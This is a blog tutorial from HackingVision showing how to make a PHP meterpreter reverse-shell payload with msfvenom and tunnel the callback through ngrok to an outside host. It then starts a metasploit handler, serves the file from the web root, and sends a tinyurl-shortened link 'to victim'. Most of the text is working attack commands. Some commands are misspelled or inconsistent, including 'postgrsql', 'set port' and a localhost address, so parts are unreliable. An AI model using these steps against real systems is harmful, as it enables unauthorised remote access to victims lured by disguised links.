Hacking with PHP payloads and ngrok – HackingVision
Welcome back to HackingVision. Today we will be hacking with PHP payloads, in this tutorial we will be using msfvenom.
Msfvenom comes included with Kali Linux operating system if you don’t already have Kali Linux installed you can download here.
Step 1: Installing ngrok
Please follow the instructions to install ngrok.
Lets start by downloading ngrok. Download ngrok here https://ngrok.com/download .
Once ngrok has finished downloading extract the Zip archive and then cd into it for example “cd ngrok”
Install your authtoken (auth code below is a example copy auth token from ngrok.com account.Copy the authentication code from your account in ngrok.com we will be using this to authenticate our tunnel. You can do this by going to the folder where ngrok is stored and using .”/ngrok authtoken yourauthtokenhere ” The authentication code will then be saved.
./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3
Now we will create a secure TCP tunnel. Open up a new terminal and type ngrok tcp 4545 change port number to whatever port you would like to use.
Step 2: Creating PHP Payload
We will now use msfvenom to create PHP payload.
Open up a new command terminal enter command below change LPORT to port you specified when starting ngrok.
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=17928 R > home.php
Step 3: Starting multi/handler
In a new command terminal enter commands
service postgrsql start
service apache2 start
Enter commands below into terminal.
set payload php/meterpreter/reverse_tcp
set lhost 127.0.0.1
set port 17928
Copy the php file to /var/www/html
Type exploit in msfconsole terminal.
Step 4: Shorten URL
Go to tinyurl.com and shorten url.
For example 127.0.0.1:17928
Send shortened Tiny URL link to victim since we are working within local environment
Hope u enjoyed this tutorial more to come happy hacking and remember hack the planet.
Please consider downloading Brave Browser by downloading Brave Browser through our website you won’t only be downloading a great privacy browser you will also be supporting (HackingVision.com). We are not using Google Ads as we respect our users privacy. We encourage you to use an Ad-blocker or a browser that has a built in ad-blocker and other privacy features such as VPN.
- Advanced Bash Shell Scripting Guide PDF Programming eBook Download - 14th February 2019
- The Hacker’s Handbook: The Strategy Behind Breaking Into and Defending Networks - 13th February 2019
- Linux Basics for Hackers - 12th February 2019